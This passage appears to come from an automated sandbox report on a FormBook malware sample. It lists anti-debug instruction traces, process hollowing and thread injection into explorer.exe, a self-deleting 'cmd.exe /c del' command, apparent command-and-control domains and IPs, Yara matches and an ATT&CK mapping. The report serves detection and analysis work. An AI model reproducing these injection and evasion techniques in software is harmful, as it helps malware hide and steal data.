          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04753A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04768E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04748A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04778EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04805BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeDomain query: www.socialeconomic.net
          Source: C:\Windows\explorer.exeDomain query: www.onlinecasinocrazy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.64.147.164 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.sabaidiving.com
          Source: C:\Windows\explorer.exeDomain query: www.cityofhouston.info
          Source: C:\Windows\explorer.exeDomain query: www.thebenefitssherpa.com
          Source: C:\Windows\explorer.exeDomain query: www.ximibabes.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 119.81.45.82 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.53 80
          Source: C:\Windows\explorer.exeDomain query: www.toypoodlebreedershome.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.15.186.68 80
          Source: C:\Windows\explorer.exeDomain query: www.onemoresysadmin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.88.52.88 80
          Source: C:\Windows\explorer.exeNetwork Connect: 51.222.80.112 80
          Source: C:\Windows\explorer.exeDomain query: www.ricdevan.com
          Source: C:\Windows\explorer.exeDomain query: www.countrywideeconomy.com
          Source: C:\Windows\explorer.exeDomain query: www.blissfulbeeboutique.online
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 3C0000
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
          Source: explorer.exe, 00000006.00000002.916660686.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
